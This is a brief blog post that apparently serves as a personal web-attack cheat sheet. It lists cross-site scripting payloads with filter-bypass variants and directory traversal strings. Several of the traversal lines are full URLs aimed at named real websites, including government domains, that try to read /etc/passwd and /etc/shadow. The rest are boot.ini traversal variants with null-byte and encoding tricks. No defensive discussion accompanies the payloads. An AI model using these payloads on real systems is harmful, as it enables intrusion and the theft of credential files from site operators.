Testing

XSS

http://htmlpurifier.org/live/smoketests/xssAttacks.php

http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90

'';!--"<XSS>=&{()}

1  y=

<div style=width:expression(alert(/xss/))>

<div style=width:expression(prompt(937511))>

1%20onmouseover%3dprompt(920753)%20y%3d

<scr<script>ipt>alert(1)</scr<script>ipt>

<img src=d.jpg onerror=confirm(/xss/)>

style=width:expression(alert(/xss/))

<svg><s1cript>alert&#40/1/&#41</script>


―――――――――――――――――――

Directory traversal

http://www.leaf520.com/bbs/viewtopic.php?f=53&t=441

http://www.ynjst.gov.cn:82/ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow
http://cks.mof.gov.cn/crifs/content/docmanage/download.jspfilePath=../../../../../../../../etc/passwd/do=../../../../../../../../../../etc/passwd%00.jpg&mod=info&sort_id=6
http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg


This article is from the "无双城" blog. Please do not repost.
